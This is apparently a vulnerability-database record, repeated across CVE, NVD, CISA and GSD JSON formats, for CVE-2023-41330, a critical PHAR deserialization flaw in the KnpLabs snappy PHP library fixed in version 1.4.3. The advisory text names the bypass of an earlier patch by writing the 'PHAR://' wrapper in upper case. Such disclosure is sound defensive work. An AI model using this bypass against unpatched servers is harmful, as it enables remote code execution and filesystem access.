CVE-2023-41330 (GCVE-0-2023-41330)
Vulnerability from cvelistv5 – Published: 2023-09-06 17:33 – Updated: 2024-09-30 15:54
VLAI?
Title
Unsafe deserialization in knplabs/knp-snappy
Summary
knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.
## Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\strpos($filename, 'phar://') === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator->generate(...)` function.
Severity ?
9.8 (Critical)
CWE
- CWE-502 - Deserialization of Untrusted Data
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:01:33.613Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"name": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-41330",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-30T15:54:05.463352Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-30T15:54:18.428Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "snappy",
"vendor": "KnpLabs",
"versions": [
{
"status": "affected",
"version": "\u003c 1.4.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\n## Issue\n\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-09-06T17:33:21.098Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"name": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
}
],
"source": {
"advisory": "GHSA-92rv-4j2h-8mjj",
"discovery": "UNKNOWN"
},
"title": "Unsafe deserialization in knplabs/knp-snappy"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-41330",
"datePublished": "2023-09-06T17:33:21.098Z",
"dateReserved": "2023-08-28T16:56:43.366Z",
"dateUpdated": "2024-09-30T15:54:18.428Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"1.4.3\", \"matchCriteriaId\": \"C2412BC7-4738-4E4B-9382-9C967F55BEC0\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\\n## Issue\\n\\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\\n\"}, {\"lang\": \"es\", \"value\": \"knplabs/knp-snappy es una librer\\u00eda PHP que permite la generaci\\u00f3n de thumbnail, snapshots o PDFs desde una URL o una p\\u00e1gina HTML. ## El problema que revel\\u00f3 la vulnerabilidad CVE-2023-28115 el 17 de marzo, permite a un atacante obtener la ejecuci\\u00f3n remota de c\\u00f3digo mediante la deserializaci\\u00f3n PHAR. La versi\\u00f3n 1.4.2 agreg\\u00f3 una verificaci\\u00f3n `if (\\\\strpos($filename, \u0027phar://\u0027) === 0)` en la funci\\u00f3n `prepareOutput` para resolver este CVE, sin embargo, si el usuario puede controlar el segundo par\\u00e1metro de la funci\\u00f3n `generateFromHtml()` de Snappy, luego se pasar\\u00e1 como el par\\u00e1metro `$filename` en la funci\\u00f3n `prepareOutput()`. En la vulnerabilidad original, un nombre de archivo con un contenedor `phar://` podr\\u00eda enviarse a la funci\\u00f3n `fileExists()`, equivalente a la funci\\u00f3n PHP `file_exists()`. Esto permiti\\u00f3 a los usuarios activar una deserializaci\\u00f3n en archivos PHAR arbitrarios. Para solucionar este problema, la cadena ahora se pasa a la funci\\u00f3n `strpos()` y si comienza con `phar://`, se genera una excepci\\u00f3n. Sin embargo, como los contenedores de PHP no distinguen entre may\\u00fasculas y min\\u00fasculas, este parche se puede omitir usando `PHAR://` en lugar de `phar://`. Una explotaci\\u00f3n exitosa de esta vulnerabilidad permite ejecutar c\\u00f3digo arbitrario y acceder al sistema de archivos subyacente. El atacante debe poder cargar un archivo y el servidor debe ejecutar una versi\\u00f3n de PHP anterior a la 8. Este problema se solucion\\u00f3 en el commit `d3b742d61a` que se incluy\\u00f3 en la versi\\u00f3n 1.4.3. Se recomienda a los usuarios que actualicen. Los usuarios que no puedan actualizar deben asegurarse de que solo los usuarios confiables puedan enviar datos a la funci\\u00f3n `AbstractGenerator-\u0026gt;generate(...)`.\"}]",
"id": "CVE-2023-41330",
"lastModified": "2024-11-21T08:21:05.347",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
"published": "2023-09-06T18:15:09.153",
"references": "[{\"url\": \"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Mitigation\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Mitigation\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-502\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-41330\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-09-06T18:15:09.153\",\"lastModified\":\"2024-11-21T08:21:05.347\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\\n## Issue\\n\\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\\n\"},{\"lang\":\"es\",\"value\":\"knplabs/knp-snappy es una librer\u00eda PHP que permite la generaci\u00f3n de thumbnail, snapshots o PDFs desde una URL o una p\u00e1gina HTML. ## El problema que revel\u00f3 la vulnerabilidad CVE-2023-28115 el 17 de marzo, permite a un atacante obtener la ejecuci\u00f3n remota de c\u00f3digo mediante la deserializaci\u00f3n PHAR. La versi\u00f3n 1.4.2 agreg\u00f3 una verificaci\u00f3n `if (\\\\strpos($filename, \u0027phar://\u0027) === 0)` en la funci\u00f3n `prepareOutput` para resolver este CVE, sin embargo, si el usuario puede controlar el segundo par\u00e1metro de la funci\u00f3n `generateFromHtml()` de Snappy, luego se pasar\u00e1 como el par\u00e1metro `$filename` en la funci\u00f3n `prepareOutput()`. En la vulnerabilidad original, un nombre de archivo con un contenedor `phar://` podr\u00eda enviarse a la funci\u00f3n `fileExists()`, equivalente a la funci\u00f3n PHP `file_exists()`. Esto permiti\u00f3 a los usuarios activar una deserializaci\u00f3n en archivos PHAR arbitrarios. Para solucionar este problema, la cadena ahora se pasa a la funci\u00f3n `strpos()` y si comienza con `phar://`, se genera una excepci\u00f3n. Sin embargo, como los contenedores de PHP no distinguen entre may\u00fasculas y min\u00fasculas, este parche se puede omitir usando `PHAR://` en lugar de `phar://`. Una explotaci\u00f3n exitosa de esta vulnerabilidad permite ejecutar c\u00f3digo arbitrario y acceder al sistema de archivos subyacente. El atacante debe poder cargar un archivo y el servidor debe ejecutar una versi\u00f3n de PHP anterior a la 8. Este problema se solucion\u00f3 en el commit `d3b742d61a` que se incluy\u00f3 en la versi\u00f3n 1.4.3. Se recomienda a los usuarios que actualicen. Los usuarios que no puedan actualizar deben asegurarse de que solo los usuarios confiables puedan enviar datos a la funci\u00f3n `AbstractGenerator-\u0026gt;generate(...)`.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.4.3\",\"matchCriteriaId\":\"C2412BC7-4738-4E4B-9382-9C967F55BEC0\"}]}]}],\"references\":[{\"url\":\"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\", \"name\": \"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T19:01:33.613Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-41330\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-09-30T15:54:05.463352Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-09-30T15:54:12.986Z\"}}], \"cna\": {\"title\": \"Unsafe deserialization in knplabs/knp-snappy\", \"source\": {\"advisory\": \"GHSA-92rv-4j2h-8mjj\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"KnpLabs\", \"product\": \"snappy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.4.3\"}]}], \"references\": [{\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"name\": \"https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\", \"name\": \"https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\\n## Issue\\n\\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\\n\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-09-06T17:33:21.098Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-41330\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-30T15:54:18.428Z\", \"dateReserved\": \"2023-08-28T16:56:43.366Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-09-06T17:33:21.098Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GSD-2023-41330
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.
## Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\strpos($filename, 'phar://') === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator->generate(...)` function.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-41330",
"id": "GSD-2023-41330"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-41330"
],
"details": "knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\n## Issue\n\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\n",
"id": "GSD-2023-41330",
"modified": "2023-12-13T01:20:45.260867Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2023-41330",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "snappy",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 1.4.3"
}
]
}
}
]
},
"vendor_name": "KnpLabs"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\n## Issue\n\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\n"
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-502",
"lang": "eng",
"value": "CWE-502: Deserialization of Untrusted Data"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj",
"refsource": "MISC",
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
"refsource": "MISC",
